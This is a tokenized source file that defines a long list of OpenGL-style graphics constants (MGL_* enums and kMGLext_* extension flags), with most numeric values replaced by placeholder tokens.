<EOL> MGL_PROXY_TEXTURE_3D_EXT = <NUM_LIT> <EOL> MGL_W_EXT = <NUM_LIT> <EOL> kMGLext_NV_occlusion_query = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB11_4_NV = <NUM_LIT> <EOL> MGL_MATRIX24 = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_3D = <NUM_LIT> <EOL> MGL_FLOAT_CLEAR_COLOR_VALUE_NV = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB10_4_NV = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_IMAGES = <NUM_LIT> <EOL> MGL_PROGRAM_FORMAT_ASCII = <NUM_LIT> <EOL> MGL_T = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB9_4_NV = <NUM_LIT> <EOL> MGL_REG_2_ATI = <NUM_LIT> <EOL> MGL_COMPRESSED_ALPHA = <NUM_LIT> <EOL> MGL_COLOR_SUM = <NUM_LIT> <EOL> MGL_VERTEX_STATE_PROGRAM_NV = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_ARB = <NUM_LIT> <EOL> MGL_COPY_INVERTED = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_TWO_SIDE = <NUM_LIT> <EOL> MGL_MULTISAMPLE_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Z_ARB = <NUM_LIT> <EOL> MGL_COMPRESSED_RGB_S3TC_DXT1_EXT = <NUM_LIT> <EOL> kMGLext_MGLX_choose_fbconfig = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB7_4_NV = <NUM_LIT> <EOL> MGL_RESCALE_NORMAL_EXT = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_POINT_SIZE = <NUM_LIT> <EOL> MGL_MIRRORED_REPEAT_IBM = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_INVERT = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM = <NUM_LIT> <EOL> MGL_Z_EXT = <NUM_LIT> <EOL> MGL_SEPARATE_SPECULAR_COLOR = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB5_4_NV = <NUM_LIT> <EOL> MGL_SOURCE1_RGB_EXT = <NUM_LIT> <EOL> MGL_SWIZZLE_STRQ_DQ_ATI = <NUM_LIT> <EOL> MGL_SINGLE_COLOR = <NUM_LIT> <EOL> MGL_LIGHTING_BIT = <NUM_LIT:64> <EOL> MGL_NOR = <NUM_LIT> <EOL> MGL_S = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_COLOR_CONTROL = <NUM_LIT> <EOL> kMGLext_ARB_texture_float = <NUM_LIT> <EOL> MGL_OR = <NUM_LIT> <EOL> MGL_REG_1_ATI = <NUM_LIT> <EOL> MGL_SWIZZLE_STQ_DQ_ATI = <NUM_LIT> <EOL> MGL_CULL_VERTEX_OBJECT_POSITION_EXT = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB2_4_NV = <NUM_LIT> <EOL> MGL_SWIZZLE_STR_DR_ATI = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> kMGLext_ARB_texture_non_power_of_two = <NUM_LIT> <EOL> MGL_CULL_VERTEX_EYE_POSITION_EXT = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB1_4_NV = <NUM_LIT> <EOL> MGL_CULL_VERTEX_EXT = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_DECAL = <NUM_LIT> <EOL> MGL_AND_INVERTED = <NUM_LIT> <EOL> MGL_SWIZZLE_STR_ATI = <NUM_LIT> <EOL> MGL_Y_EXT = <NUM_LIT> <EOL> MGL_ARRAY_ELEMENT_LOCK_COUNT_EXT = <NUM_LIT> <EOL> MGL_TRIANGLE_FAN = <NUM_LIT:6> <EOL> MGL_MAP1_VERTEX_ATTRIB15_4_NV = <NUM_LIT> <EOL> MGL_SOURCE0_RGB_EXT = <NUM_LIT> <EOL> MGL_COLOR_ALPHA_PAIRING_ATI = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_POINT_SIZE_NV = <NUM_LIT> <EOL> MGL_ARRAY_ELEMENT_LOCK_FIRST_EXT = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB14_4_NV = <NUM_LIT> <EOL> MGL_SIGNED_HILO16_NV = <NUM_LIT> <EOL> MGL_CLAMP_TO_BORDER_ARB = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB13_4_NV = <NUM_LIT> <EOL> MGL_REG_0_ATI = <NUM_LIT> <EOL> MGL_NUM_INPUT_INTERPOLATOR_COMPONENTS_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_FAIL_VALUE_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD31_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB12_4_NV = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_UNITS = <NUM_LIT> <EOL> MGL_UNPACK_ALIGNMENT = <NUM_LIT> <EOL> MGL_TEXTURE_GEQUAL_R_SGIX = <NUM_LIT> <EOL> MGL_VECTOR_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB11_4_NV = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_INVARIANTS_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_LEQUAL_R_SGIX = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB10_4_NV = <NUM_LIT> <EOL> kMGLext_ARB_OpenMGL20 = <NUM_LIT> <EOL> MGL_NUM_PASSES_ATI = <NUM_LIT> <EOL> MGL_X_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_OPERATOR_SGIX = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_TWO_SIDE_NV = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB9_4_NV = <NUM_LIT> <EOL> MGL_V3F = <NUM_LIT> <EOL> MGL_CLAMP = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_SGIX = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_RECTANGLE = <NUM_LIT> <EOL> kMGLext_EXT_vertex_shader = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB8_4_NV = <NUM_LIT> <EOL> MGL_VERSION = <NUM_LIT> <EOL> MGL_COMPARE_R_TO_TEXTURE_ARB = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB7_4_NV = <NUM_LIT> <EOL> MGL_AND = <NUM_LIT> <EOL> MGL_SECONDARY_INTERPOLATOR_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_FUNC_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD30_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB6_4_NV = <NUM_LIT> <EOL> MGL_DOT2_ADD_ATI = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_PIXELS = <NUM_LIT> <EOL> MGL_TEXTURE_COMPARE_MODE_ARB = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB5_4_NV = <NUM_LIT> <EOL> MGL_CND0_ATI = <NUM_LIT> <EOL> MGL_DEPTH_TEXTURE_MODE_ARB = <NUM_LIT> <EOL> MGL_CURRENT_VERTEX_WEIGHT_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB4_4_NV = <NUM_LIT> <EOL> MGL_LINEAR_MIPMAP_LINEAR = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_OPTIMIZED_EXT = <NUM_LIT> <EOL> kMGLext_convolution = <NUM_LIT> <EOL> MGL_MATRIX17 = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB3_4_NV = <NUM_LIT> <EOL> MGL_V2F = <NUM_LIT> <EOL> MGL_NEAREST_MIPMAP_LINEAR = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT32_ARB = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB2_4_NV = <NUM_LIT> <EOL> MGL_LINEAR_MIPMAP_NEAREST = <NUM_LIT> <EOL> MGL_HILO16_NV = <NUM_LIT> <EOL> MGL_MATRIX15 = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB1_4_NV = <NUM_LIT> <EOL> MGL_FRONT = <NUM_LIT> <EOL> MGL_NEAREST_MIPMAP_NEAREST = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT16_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD29_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_ATTRIB0_4_NV = <NUM_LIT> <EOL> MGL_LINEAR = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_ROWS = <NUM_LIT> <EOL> MGL_MATRIX13 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY15_NV = <NUM_LIT> <EOL> kMGLext_SGIX_depth_texture = <NUM_LIT> <EOL> MGL_MATRIX12 = <NUM_LIT> <EOL> MGL_MODELVIEW1_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY14_NV = <NUM_LIT> <EOL> MGL_T2F_C3F_V3F = <NUM_LIT> <EOL> MGL_TEXTURE_SHADER_NV = <NUM_LIT> <EOL> MGL_EYE_PLANE = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_LOCALS_EXT = <NUM_LIT> <EOL> MGL_POINT_SIZE_MAX_ARB = <NUM_LIT> <EOL> kMGLext_NV_fragment_program = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY13_NV = <NUM_LIT> <EOL> MGL_MATRIX19 = <NUM_LIT> <EOL> MGL_OBJECT_PLANE = <NUM_LIT> <EOL> MGL_POINT_SIZE_MIN_ARB = <NUM_LIT> <EOL> MGL_PROGRAM_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY12_NV = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_MODE = <NUM_LIT> <EOL> MGL_VENDOR = <NUM_LIT> <EOL> MGL_INVARIANT_VALUE_EXT = <NUM_LIT> <EOL> MGL_MATRIX9 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY11_NV = <NUM_LIT> <EOL> MGL_BACK = <NUM_LIT> <EOL> MGL_BYTE = <NUM_LIT> <EOL> MGL_SPHERE_MAP = <NUM_LIT> <EOL> MGL_BGRA_EXT = <NUM_LIT> <EOL> MGL_COLOR_INDEX4_EXT = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY10_NV = <NUM_LIT> <EOL> MGL_OBJECT_LINEAR = <NUM_LIT> <EOL> MGL_UNPACK_ROW_LENGTH = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Y_ARB = <NUM_LIT> <EOL> MGL_BGR_EXT = <NUM_LIT> <EOL> kMGLext_ARB_vertex_blend = <NUM_LIT> <EOL> kMGLext_MGLX_create_pbuffer = <NUM_LIT> <EOL> kMGLext_ARB_shadow_ambient = <NUM_LIT> <EOL> MGL_SIGNED_ALPHA8_NV = <NUM_LIT> <EOL> MGL_MULTISAMPLE_BIT_ARB = <NUM_LIT> <EOL> MGL_FLOAT_VEC4_ARB = <NUM_LIT> <EOL> MGL_SIGNED_ALPHA_NV = <NUM_LIT> <EOL> MGL_LOAD = <NUM_LIT> <EOL> MGL_MATRIX5 = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_TEXTURE22 = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE8_ALPHA8_NV = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_VALUE_ARB = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_EXT = <NUM_LIT> <EOL> MGL_INTERLEAVED_ATTRIBS_EXT = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE_ALPHA_NV = <NUM_LIT> <EOL> MGL_DSDT_MAG_NV = <NUM_LIT> <EOL> MGL_SAMPLES_ARB = <NUM_LIT> <EOL> kMGLext_ARB_half_float_pixel = <NUM_LIT> <EOL> MGL_COMPILE = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE8_NV = <NUM_LIT> <EOL> kMGLext_MGLX_get_visual_from_fbconfig_sgix = <NUM_LIT> <EOL> MGL_SAMPLE_BUFFERS_ARB = <NUM_LIT> <EOL> MGL_COLOR_INDEX2_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_INTENSITY_SIZE = <NUM_LIT> <EOL> MGL_SIGNED_LUMINANCE_NV = <NUM_LIT> <EOL> MGL_UNPACK_LSB_FIRST = <NUM_LIT> <EOL> MGL_MATRIX1 = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> kMGLext_ARB_shadow = <NUM_LIT> <EOL> MGL_Q = <NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_ONE_ARB = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHTING_EXT = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_make_current_read = <NUM_LIT> <EOL> MGL_SIGNED_RGB_NV = <NUM_LIT> <EOL> MGL_RETURN = <NUM_LIT> <EOL> MGL_STENCIL_BITS = <NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_COVERAGE_ARB = <NUM_LIT> <EOL> MGL_TRIANGLE_STRIP = <NUM_LIT:5> <EOL> MGL_ADD_SIGNED_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGBA8_NV = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Z = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_MATRIX_STACK_DEPTH = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGBA_NV = <NUM_LIT> <EOL> MGL_DSDT_NV = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_MATRICES = <NUM_LIT> <EOL> MGL_SHORT = <NUM_LIT> <EOL> MGL_EXTENSIONS = <NUM_LIT> <EOL> MGL_MAX_VERTEX_ATTRIBS = <NUM_LIT> <EOL> MGL_COLOR_INDEX1_EXT = <NUM_LIT> <EOL> MGL_TEXTURE22_ARB = <NUM_LIT> <EOL> MGL_SIGNED_HILO_NV = <NUM_LIT> <EOL> MGL_UNPACK_SWAP_BYTES = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX_STACK_DEPTH = <NUM_LIT> <EOL> MGL_TEXTURE21_ARB = <NUM_LIT> <EOL> MGL_EIGHTH_BIT_ATI = <NUM_LIT:32> <EOL> MGL_RENDERER = <NUM_LIT> <EOL> MGL_TRANSPOSE_CURRENT_MATRIX = <NUM_LIT> <EOL> MGL_FLOAT_VEC2_ARB = <NUM_LIT> <EOL> MGL_TEXTURE20_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_HI_SIZE_NV = <NUM_LIT> <EOL> MGL_DSDT_MAG_VIB_NV = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_VARIANTS_EXT = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX = <NUM_LIT> <EOL> MGL_TEXTURE19_ARB = <NUM_LIT> <EOL> MGL_DECR = <NUM_LIT> <EOL> MGL_PROGRAM_ERROR_POSITION = <NUM_LIT> <EOL> MGL_PROGRAM_LENGTH = <NUM_LIT> <EOL> MGL_TEXTURE_RECTANGLE = <NUM_LIT> <EOL> kMGLext_EXT_vertex_weighting = <NUM_LIT> <EOL> MGL_TEXTURE18_ARB = <NUM_LIT> <EOL> MGL_INCR = <NUM_LIT> <EOL> MGL_REPLACE = <NUM_LIT> <EOL> MGL_CON_22_ATI = <NUM_LIT> <EOL> MGL_PROGRAM_STRING = <NUM_LIT> <EOL> MGL_TEXTURE17_ARB = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_ATTRIBS_EXT = <NUM_LIT> <EOL> MGL_HILO_NV = <NUM_LIT> <EOL> MGL_PROGRAM_UNDER_NATIVE_LIMITS = <NUM_LIT> <EOL> MGL_COLOR_TABLE_INTENSITY_SIZE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE16_ARB = <NUM_LIT> <EOL> MGL_KEEP = <NUM_LIT> <EOL> MGL_PIXEL_MAP_A_TO_A_SIZE = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ENV_PARAMETERS = <NUM_LIT> <EOL> MGL_TEXTURE15_ARB = <NUM_LIT> <EOL> MGL_LO_SCALE_NV = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_REFLECT_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_LOCAL_PARAMETERS = <NUM_LIT> <EOL> MGL_SHADER_OBJECT_ARB = <NUM_LIT> <EOL> MGL_TEXTURE14_ARB = <NUM_LIT> <EOL> MGL_FLAT = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_INSTRUCTIONS_EXT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_TEXTURE13_ARB = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_TEXTURE_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_TEXTURE12_ARB = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_TEXTURE_3D_NV = <NUM_LIT> <EOL> MGL_CONSTANT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_TEXTURE11_ARB = <NUM_LIT> <EOL> MGL_CONSTANT_ATTENUATION = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_PROGRAM_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD24_EXT = <NUM_LIT> <EOL> MGL_TEXTURE10_ARB = <NUM_LIT> <EOL> MGL_POLYGON_MODE = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_DEPTH_REPLACE_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_B_TO_B_SIZE = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_ATTRIBS = <NUM_LIT> <EOL> MGL_TEXTURE9_ARB = <NUM_LIT> <EOL> MGL_ALPHA_TEST = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_NV = <NUM_LIT> <EOL> MGL_OP_RECIP_EXT = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_ATTRIBS = <NUM_LIT> <EOL> MGL_OBJECT_SHADER_SOURCE_LENGTH_ARB = <NUM_LIT> <EOL> MGL_TEXTURE8_ARB = <NUM_LIT> <EOL> MGL_SHADER_CONSISTENT_NV = <NUM_LIT> <EOL> MGL_ISOTROPIC_BRDF_NV = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_LOCALS_EXT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ATTRIBS = <NUM_LIT> <EOL> MGL_TEXTURE7_ARB = <NUM_LIT> <EOL> MGL_DEPENDENT_GB_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_PROGRAM_ATTRIBS = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_R_EXT = <NUM_LIT> <EOL> MGL_TEXTURE6_ARB = <NUM_LIT> <EOL> MGL_DEPENDENT_AR_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_SMOOTH = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_ARB = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_RGBA16 = <NUM_LIT> <EOL> MGL_TEXTURE5_ARB = <NUM_LIT> <EOL> MGL_RASTERIZER_DISCARD_EXT = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_PARAMETERS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD23_EXT = <NUM_LIT> <EOL> MGL_TEXTURE4_ARB = <NUM_LIT> <EOL> MGL_CULL_FRAGMENT_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_G_TO_G_SIZE = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_4 = <NUM_LIT> <EOL> MGL_RGB10_A2 = <NUM_LIT> <EOL> MGL_DOT3_RGB = <NUM_LIT> <EOL> kMGLext_WMGL_NV_allocate_memory = <NUM_LIT> <EOL> MGL_TEXTURE3_ARB = <NUM_LIT> <EOL> MGL_CLIENT_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_PASS_THROUGH_NV = <NUM_LIT> <EOL> kMGLext_ARB_matrix_palette = <NUM_LIT> <EOL> MGL_RGBA8 = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB15_4_NV = <NUM_LIT> <EOL> MGL_NUM_INSTRUCTIONS_PER_PASS_ATI = <NUM_LIT> <EOL> MGL_BUFFER_SIZE_ARB = <NUM_LIT> <EOL> MGL_CONST_EYE_NV = <NUM_LIT> <EOL> MGL_LESS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD16_EXT = <NUM_LIT> <EOL> MGL_RGB5_A1 = <NUM_LIT> <EOL> MGL_READ_WRITE_ARB = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_S8_S8_8_8_NV = <NUM_LIT> <EOL> MGL_TEXTURE21 = <NUM_LIT> <EOL> MGL_PREVIOUS_TEXTURE_INPUT_NV = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH_SIZE_ARB = <NUM_LIT> <EOL> MGL_RGBA4 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_NORMALIZED = <NUM_LIT> <EOL> MGL_TEXTURE0_ARB = <NUM_LIT> <EOL> MGL_RENDERBUFFER_BINDING = <NUM_LIT> <EOL> MGL_LIGHTING = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_DIFFUSE_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY1_NV = <NUM_LIT> <EOL> MGL_RGBA2 = <NUM_LIT> <EOL> MGL_PROGRAM_PARAMETERS = <NUM_LIT> <EOL> MGL_RGBA32F = <NUM_LIT> <EOL> kMGLext_ARB_vertex_buffer_object = <NUM_LIT> <EOL> MGL_MATRIX27 = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_EXT = <NUM_LIT> <EOL> MGL_FLOAT = <NUM_LIT> <EOL> MGL_FRONT_FACE = <NUM_LIT> <EOL> MGL_RGB16 = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD22_EXT = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_MATRIX_NV = <NUM_LIT> <EOL> MGL_COMBINER_MAPPING_NV = <NUM_LIT> <EOL> MGL_RGB12 = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGB_UNSIGNED_ALPHA_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_LUMINANCE_SIZE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_BIT = <NUM_LIT> <EOL> MGL_CULL_MODES_NV = <NUM_LIT> <EOL> MGL_RGB10 = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_EDGE_FLAG = <NUM_LIT> <EOL> MGL_RGB8 = <NUM_LIT> <EOL> MGL_STATIC_COPY_ARB = <NUM_LIT> <EOL> kMGLext_ATI_meminfo = <NUM_LIT> <EOL> MGL_POLYGON_STIPPLE = <NUM_LIT> <EOL> MGL_REG_5_ATI = <NUM_LIT> <EOL> MGL_RGB5 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_STATIC_READ_ARB = <NUM_LIT> <EOL> MGL_NUM_COMPRESSED_TEXTURE_FORMATS = <NUM_LIT> <EOL> MGL_POLYGON_SMOOTH = <NUM_LIT> <EOL> MGL_SELECT = <NUM_LIT> <EOL> MGL_RGB4 = <NUM_LIT> <EOL> MGL_STATIC_DRAW_ARB = <NUM_LIT> <EOL> MGL_SPOT_DIRECTION = <NUM_LIT> <EOL> MGL_DSDT_MAG_INTENSITY_NV = <NUM_LIT> <EOL> MGL_R3_G3_B2 = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD21_EXT = <NUM_LIT> <EOL> MGL_MODELVIEW = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_EXT = <NUM_LIT> <EOL> kMGLext_SGIX_shadow = <NUM_LIT> <EOL> MGL_LIST_INDEX = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_A_SIZE = <NUM_LIT> <EOL> MGL_PACK_SKIP_ROWS = <NUM_LIT> <EOL> MGL_FENCE_CONDITION_NV = <NUM_LIT> <EOL> MGL_INTENSITY16 = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_CND_ATI = <NUM_LIT> <EOL> MGL_LIST_BASE = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_INTENSITY12 = <NUM_LIT> <EOL> MGL_SHININESS = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_MAX_LIST_NESTING = <NUM_LIT> <EOL> MGL_ENABLE_BIT = <NUM_LIT> <EOL> MGL_INTENSITY8 = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_LIST_MODE = <NUM_LIT> <EOL> MGL_INTENSITY4 = <NUM_LIT> <EOL> MGL_VARIABLE_C_NV = <NUM_LIT> <EOL> MGL_LUMINANCE_ALPHA16F = <NUM_LIT> <EOL> kMGLext_EXT_fog_coord = <NUM_LIT> <EOL> MGL_CURRENT_FOG_COORDINATE_EXT = <NUM_LIT> <EOL> MGL_LINE_STIPPLE_REPEAT = <NUM_LIT> <EOL> MGL_RGB_SCALE = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD25_EXT = <NUM_LIT> <EOL> MGL_FLOAT_RG32_NV = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_TRANSPOSE_TEXTURE_MATRIX_ARB = <NUM_LIT> <EOL> MGL_LINE_STIPPLE_PATTERN = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD13_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE16_ALPHA16 = <NUM_LIT> <EOL> MGL_CLIP_PLANE0 = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_EXT = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_CONST_EYE_REFLECT_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_LINE_STIPPLE = <NUM_LIT> <EOL> MGL_BIAS_BY_NEGATIVE_ONE_HALF_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_BLUE_SIZE_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE12_ALPHA12 = <NUM_LIT> <EOL> MGL_SOURCE1_ALPHA_EXT = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_SOURCE_EXT = <NUM_LIT> <EOL> MGL_MAX = <NUM_LIT> <EOL> MGL_TEXTURE7 = <NUM_LIT> <EOL> MGL_LINE_WIDTH_GRANULARITY = <NUM_LIT> <EOL> MGL_LUMINANCE12_ALPHA4 = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB12_4_NV = <NUM_LIT> <EOL> kMGLext_texture_border_clamp = <NUM_LIT:15> <EOL> MGL_COMPRESSED_RGBA_S3TC_DXT5_EXT = <NUM_LIT> <EOL> MGL_LINE_WIDTH_RANGE = <NUM_LIT> <EOL> MGL_LUMINANCE8_ALPHA8 = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_LINE_WIDTH = <NUM_LIT> <EOL> MGL_FLOAT_RGB_NV = <NUM_LIT> <EOL> MGL_VARIABLE_B_NV = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_LINE_SMOOTH = <NUM_LIT> <EOL> 